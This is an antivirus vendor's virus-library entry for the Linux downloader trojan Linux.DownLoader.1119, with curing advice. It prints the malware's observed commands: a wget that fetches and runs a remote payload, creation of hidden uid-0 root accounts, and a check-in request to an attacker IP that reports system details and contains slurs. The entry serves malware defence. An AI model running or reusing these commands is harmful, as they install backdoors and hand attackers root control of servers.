FOR CUSTOMERS

My library

+ Add to library

Search

24/7 Tech support | Rules regarding submitting

Send a message

Call us

+7 (495) 789-45-86

Forum

Your tickets

Total: -
Active: -
Latest: -

Call us

+7 (495) 789-45-86

EN

RU CN DE EN ES FR IT JP KZ UZ PL BY

Support services

Dr.Web vxCube

Sign in to Dr.Web vxCube

VCI investigations

Virus library

Knowledge base

Technologies

Terminology

Training and education

Myths

Myths about anti-viruses

Linux.DownLoader.1119

Added to the Dr.Web virus database: 2019-06-14

Virus description added: 2019-06-14

Technical Information

Malicious functions:

Removes itself

Launches processes:

bash
wget -q http://thebestperlscripts.cf/.../os -O protections
chmod 777 protections
./protections
tr -d ./
clear
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash system
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash os
nscd -i passwd
nscd -i group
passwd system
passwd os
grep -Ew #Port|Port /etc/ssh/sshd_config
head -n1
awk {print $2}
lsb_release -d
awk {$1= \"\"; print $0}
nproc --all
free -mt
grep Total:
wget -qO- http://5.135.9.132/WelcomeNewBotBuddy/OwO.php?HOLETOFUCK=22&OSCHECKNIGNOG=DUBIUNTUBITCH&RUNNINGOS= Debian GNU/Linux 8.3 (jessie)&TOTALCPU=1&TOTALRAM=959&HOWTFELSEDOIGETIN=PwzLetMeInYourServerSoWeCanFuckSenpaiCodeAbuse

Performs operations with the file system:

Modifies file access rights:

/root/protections
/etc/passwd+
/etc/shadow+
/etc/subuid+
/etc/subgid+
/etc/nshadow

Creates symlinks:

/etc/passwd.lock
/etc/group.lock
/etc/gshadow.lock
/etc/subuid.lock
/etc/subgid.lock
/etc/shadow.lock

Creates or modifies files:

/root/protections
/etc/.pwd.lock
/etc/passwd.720
/etc/group.720
/etc/gshadow.720
/etc/subuid.720
/etc/subgid.720
/etc/shadow.720
/etc/passwd-
/etc/passwd+
/etc/shadow-
/etc/shadow+
/etc/subuid-
/etc/subuid+
/etc/subgid-
/etc/subgid+
/etc/passwd.724
/etc/group.724
/etc/gshadow.724
/etc/subuid.724
/etc/subgid.724
/etc/shadow.724
/etc/nshadow

Deletes files:

/etc/passwd.720
/etc/group.720
/etc/gshadow.720
/etc/subuid.720
/etc/subgid.720
/etc/shadow.720
/etc/shadow.lock
/etc/passwd.lock
/etc/group.lock
/etc/gshadow.lock
/etc/subuid.lock
/etc/subgid.lock
/etc/passwd.724
/etc/group.724
/etc/gshadow.724
/etc/subuid.724
/etc/subgid.724
/etc/shadow.724

Network activity:

Establishes connection:

<LOCAL_DNS_SERVER>

HTTP GET requests:

th#######rlscripts.cf/.../os
http://#.###.#.##########################.#####################HECKNIGNOG=DUBIUNTUBITCH&RUNNINGOS=%20Debian%20GNU/Linux%208.3%20(jessie)&TOTALCPU=1&TOTALRAM=959&HOWTFELSEDOIGETIN=PwzLetMeInYourServerSoWeCanFuckSenpaiCodeAbuse

DNS ASK:

th#####perlscripts.cf

Other:

Collects CPU information

Collects RAM information

Curing recommendations

Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number